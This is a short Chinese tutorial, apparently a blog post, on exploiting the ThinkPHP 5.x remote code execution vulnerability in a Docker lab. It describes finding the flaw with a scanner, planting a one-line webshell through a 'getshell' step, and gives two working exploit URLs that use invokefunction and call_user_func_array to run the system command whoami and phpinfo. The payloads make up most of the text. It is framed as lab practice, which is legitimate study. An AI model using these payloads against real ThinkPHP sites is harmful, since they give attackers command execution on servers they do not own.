常见框架漏洞—Thinkphp

1.搭建环境

cd /www/wwwroot/thinkphp/5-rce/

docker-compose up -d

2.访问我们搭建的环境

3.复制网站url到蓝鲸去测试漏洞

发现了两个漏洞

其中一个得到了一些信息

另一个漏洞我们在getshell中输入一句话木马,然后getshell,给我们生成了一个文件并上传到了文件,然后我们尝试访问

4.访问成功,然后我们传参

执行成功!

5.在url中输入:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

可以执行我们的系统命令

6.输入;

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

可以执行我们的代码

相关推荐
我命由我1234541 分钟前
Kotlin 数据容器 - List(List 概述、创建 List、List 核心特性、List 元素访问、List 遍历)
java·开发语言·jvm·windows·java-ee·kotlin·list
武子康3 小时前
Java-80 深入浅出 RPC Dubbo 动态服务降级:从雪崩防护到配置中心秒级生效
java·分布式·后端·spring·微服务·rpc·dubbo
YuTaoShao5 小时前
【LeetCode 热题 100】131. 分割回文串——回溯
java·算法·leetcode·深度优先
源码_V_saaskw6 小时前
JAVA图文短视频交友+自营商城系统源码支持小程序+Android+IOS+H5
java·微信小程序·小程序·uni-app·音视频·交友
超浪的晨6 小时前
Java UDP 通信详解:从基础到实战,彻底掌握无连接网络编程
java·开发语言·后端·学习·个人开发
双力臂4047 小时前
Spring Boot 单元测试进阶:JUnit5 + Mock测试与切片测试实战及覆盖率报告生成
java·spring boot·后端·单元测试
Edingbrugh.南空7 小时前
Aerospike与Redis深度对比:从架构到性能的全方位解析
java·开发语言·spring
QQ_4376643148 小时前
C++11 右值引用 Lambda 表达式
java·开发语言·c++
永卿0018 小时前
设计模式-迭代器模式
java·设计模式·迭代器模式
誰能久伴不乏8 小时前
Linux如何执行系统调用及高效执行系统调用:深入浅出的解析
java·服务器·前端